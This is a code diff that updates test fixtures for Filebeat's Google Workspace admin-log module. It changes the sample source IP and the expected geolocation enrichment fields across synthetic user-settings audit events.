+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DELETE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DOWNGRADE_USER_FROM_GPLUS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"USER_ENROLLED_IN_TWO_STEP_VERIFICATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DOWNLOAD_USERLIST_CSV"}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"MOVE_USER_TO_ORG_UNIT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"USER_EMAIL","value":"user@example.com"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"USER_PUT_IN_TWO_STEP_VERIFICATION_GRACE_PERIOD","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"RENAME_USER","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UNENROLL_USER_FROM_STRONG_AUTH","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"SUSPEND_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UNARCHIVE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UNDELETE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UNSUSPEND_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UPGRADE_USER_TO_GPLUS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"USERS_BULK_UPLOAD","parameters":[{"name":"BULK_UPLOAD_FAIL_USERS_NUMBER","value":"0"},{"name":"BULK_UPLOAD_TOTAL_USERS_NUMBER","value":"10"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"USERS_BULK_UPLOAD_NOTIFICATION_SENT","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-user-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-user-test.json.log-expected.json index 16b088935bd0..edd79299bfeb 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-user-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-user-test.json.log-expected.json @@ -8,7 +8,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_2SV_SCRATCH_CODES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_2SV_SCRATCH_CODES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "deletion", 
@@ -24,24 +24,20 @@ "log.offset": 0, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -65,7 +61,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GENERATE_2SV_SCRATCH_CODES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GENERATE_2SV_SCRATCH_CODES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "creation", 
@@ -78,27 +74,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 388, + "log.offset": 387, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -122,7 +114,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_3LO_DEVICE_TOKENS\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_3LO_DEVICE_TOKENS\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -137,27 +129,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 778, + "log.offset": 776, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -181,7 +169,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_3LO_TOKEN\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"id\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_3LO_TOKEN\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"id\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -195,27 +183,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 1238, + "log.offset": 1235, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -239,7 +223,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ADD_RECOVERY_EMAIL\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ADD_RECOVERY_EMAIL\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -252,27 +236,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 1649, + "log.offset": 1645, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -296,7 +276,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ADD_RECOVERY_PHONE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ADD_RECOVERY_PHONE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -309,27 +289,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 2031, + "log.offset": 2026, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -353,7 +329,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GRANT_ADMIN_PRIVILEGE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GRANT_ADMIN_PRIVILEGE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -366,27 +342,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 2413, + "log.offset": 2407, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -410,7 +382,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_ADMIN_PRIVILEGE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_ADMIN_PRIVILEGE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -423,27 +395,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 2798, + "log.offset": 2791, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -467,7 +435,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_ASP\",\"parameters\":[{\"name\":\"ASP_ID\",\"value\":\"id\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_ASP\",\"parameters\":[{\"name\":\"ASP_ID\",\"value\":\"id\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -481,27 +449,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 3184, + "log.offset": 3176, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -525,7 +489,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"TOGGLE_AUTOMATIC_CONTACT_SHARING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"TOGGLE_AUTOMATIC_CONTACT_SHARING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -539,27 +503,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 3589, + "log.offset": 3580, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
